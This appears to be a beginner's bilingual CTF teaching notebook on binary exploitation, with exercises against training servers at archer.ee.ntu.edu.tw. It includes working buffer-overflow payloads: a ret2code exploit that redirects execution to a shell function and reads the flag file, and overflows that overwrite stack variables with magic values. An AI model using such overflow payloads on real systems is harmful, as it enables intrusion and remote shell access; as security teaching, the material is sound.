<a href="https://colab.research.google.com/github/bradly0cjw/PWN_for_Beginner/blob/main/PWN_for_Beginner.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

# Pwn for Beginner

## Install Dependencies 安裝必要程式

- netcat

In [ ]:
!apt-get install netcat

## Challenge 1 - Crash

Try to connect to the challenge and crash it!

It would print out the flag if the program is crashed.

嘗試利用 nc 連線上題目並破壞它吧！

一旦程式發生錯誤，就可以得到這題的 FLAG

In [ ]:
!nc archer.ee.ntu.edu.tw 8000

Take a look at the source code. What's the problem?

看看這支程式的原始碼，問題出在哪？

In [ ]:
# download the source code 下載原始碼
!wget http://archer.ee.ntu.edu.tw:8888/files/1071ef4c8edd05cc0ab02cd614c113fe/crash.c -O crash.c

In [ ]:
# print the source code 印出原始碼
!cat ./crash.c

## Pwntools Tutorial

In [ ]:
# install mini-pwntools 安裝 mini-pwntools 套件套件
!pip3 install git+https://github.com/OAlienO/mini-pwntools.git

In [ ]:
# interact with the remote process
# 與遠端程式互動

from minipwn import *

r = remote('archer.ee.ntu.edu.tw', 8000)            # connect to 8000 port of archer.ee.ntu.edu.tw
                                                    # 連線到 archer.ee.ntu.edu.tw 的 8000 端口

""" example I/O 範例輸入/輸出
Hello World!
What do you want to say: aaa
Did you mean "aaa"? Nice.
"""

s = r.recvuntil('!')                                # receive until character '!' and store it to variable s (include '!')
                                                    # 從遠端接收文字直到出現 '!'，並儲存到變數 s (包含 '!')
print(s)

r.recvuntil(':')
r.sendline(b'aaa')                                  # send 'aaa' (equivalent to entering 'aaa' with nc)
                                                    # 送字串字串 'aaa' 到遠端 (等同於在用 nc 連線時直接打 'aaa')
s = r.recvuntil('\n')
print(s)

## Challenge 2 - ret2code

In [ ]:
# take a look at the challenge!
# 先連上去看看題目

!nc archer.ee.ntu.edu.tw 8001

In [ ]:
# download and print the source code
# 下載並印出原始碼

!wget http://archer.ee.ntu.edu.tw:8888/files/0e6e0d0da16308de573d6f20cc8e77e2/ret2code.c -O ret2code.c

!echo '============== SOURCE CODE =============='
!cat ./ret2code.c

In [ ]:
# download the binary
# 下載執行檔

!wget http://archer.ee.ntu.edu.tw:8888/files/1cb2cc23b69e22a55f8b598af934c0e1/ret2code -O ret2code

In [ ]:
# find the address of shell function
# 尋找 shell 函式的位置

!objdump -M intel -d ./ret2code | grep 'shell'

In [ ]:
# Exploit with pwntools
# 利用 pwntools 攻擊遠端程式

from minipwn import *

def interactive(r):                                   # interactive function, equivalent to connect directly thorugh nc
  while True:                                         # 互動模式, 等同於是直接用 nc 連線
    r.sendline(input())
    print(r.s.recv(1024).decode('utf-8'))
 


r = remote('archer.ee.ntu.edu.tw', 8001)

r.sendline(b'a'*0x10 + p64(0x400607))                 # payload = offset + shell address
r.recvuntil('\n')                                     # receive the output 接收輸出

r.sendline('cat /home/ctf/flag')                      # send shell command to print the flag 使用指令來印出 flag
s = r.recvuntil('\n')                                 # receive the output 接收輸出

print(s)

interactive(r)

## Challenge 3 - Aniki

Aniki has some words to tell you!

Hint: There is a buffer overflow vulnerability in this program, try to use ret2code technique to solve it.

提示: 這個程式有 buffer overflow 的漏洞，試著用 ret2code 的技巧解開它吧！

In [ ]:
# Exploit with pwntools
# 利用 pwntools 攻擊遠端程式

from minipwn import *

def interactive(r):                                   # interactive function, equivalent to connect directly thorugh nc
  while True:                                         # 互動模式, 等同於是直接用 nc 連線
    r.sendline(input())
    print(r.s.recv(1024).decode('utf-8'))

r = remote('archer.ee.ntu.edu.tw', 8003)

# ========= WRITE YOUR CODE HERE =========



# ========================================

interactive(r)

## Challenge 4 - pass

pass me if you can

In [ ]:
# Exploit with pwntools
# 利用 pwntools 攻擊遠端程式

from minipwn import *

def interactive(r):                                   # interactive function, equivalent to connect directly thorugh nc
  while True:                                         # 互動模式, 等同於是直接用 nc 連線
    r.sendline(input())
    print(r.s.recv(1024).decode('utf-8'))

r = remote('archer.ee.ntu.edu.tw', 8002)

print(b'a'*(0xc-0x4) + p64(0xdeadbeef))

r.sendline(b'a'*(0xc-0x4) + p64(0xdeadbeef))

interactive(r)

## Challenge 5 - luck

In [ ]:
from minipwn import *

def interactive(r):                                   # interactive function, equivalent to connect directly thorugh nc
  while True:                                         # 互動模式, 等同於是直接用 nc 連線
    print(r.s.recv(1024))
    r.sendline(input())

r = remote('archer.ee.ntu.edu.tw', 8004)

r.recvuntil('\n')
r.recvuntil('\n')

r.sendline(b'a'*12 + p64(0xfaceb00c)[:4] + p64(0xdeadbeef)[:4] + p64(0x0))

interactive(r)